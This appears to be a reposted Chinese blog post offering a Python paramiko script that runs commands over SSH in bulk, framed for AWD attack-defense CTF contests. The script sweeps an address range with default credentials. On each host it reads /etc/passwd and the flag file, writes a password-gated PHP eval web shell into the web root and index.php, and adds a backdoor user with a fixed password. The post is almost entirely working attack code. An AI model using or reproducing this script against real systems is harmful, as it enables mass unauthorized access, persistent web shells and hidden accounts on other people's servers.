AWD-ssh批量執行命令指令碼
阿新 • • 發佈:2018-12-11
前兩年有些AWD比賽,環境沒有做隔離,伺服器初始化密碼都一樣,可通過批量連線每臺伺服器來修改密碼,執行命令。
或者是已經拿到多臺伺服器許可權後,做一個批量管理。
平時企業運維中,可能也用得到。
#-*- coding: utf-8 -*- #!/usr/bin/python import paramiko import threading def ssh2(ip,username,passwd,cmd): try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip,22,username,passwd,timeout=5) #ssh.connect(ip,22,username,passwd,timeout=50) for m in cmd: stdin, stdout, stderr = ssh.exec_command(m) # stdin.write("Y") #簡單互動,輸入 ‘Y’ out = stdout.readlines() #螢幕輸出 for o in out: #print o, print o+"("+ip+")"+"\n" print '%s\tOK\n'%(ip) ssh.close() except : print '%s\tError\n'%(ip) if __name__=='__main__': cmd1="cat /etc/passwd" cmd2="echo \'<?php if(md5($_GET[\'guo\'])===\"f11487ed3a8dedaddaf0999baf85bd17\"){@eval($_POST['cmd']);} ?>\' >/var/www/html/temp123123.php " cmd2="echo \'<script language=\"PHP\"> if(md5($_GET[\'guo\'])===\"f11487ed3a8dedaddaf0999baf85bd17\"){@eval($_POST[\'cmd\']);} </script>\' >> /var/www/html/index.php" cmd3="adduser qwer" #增加賬戶qwer cmd4="echo \"123123123\"|passwd --stdin qwer" #設定該賬戶的密碼為123123123 #你要執行的命令列表 cmd = ["cat /flag.txt",cmd2,'cat /var/www/html/temp123123.php',cmd3,cmd4] username = "admin" #使用者名稱 passwd = "123456" #密碼 threads = [100] #多執行緒 print "Begin......" for i in range(1,256): # ip="192.168.32.167" #ip = '192.168.50.'+str(i) ip = "172.20."+str(i)+".101" a=threading.Thread(target=ssh2,args=(ip,username,passwd,cmd)) a.start()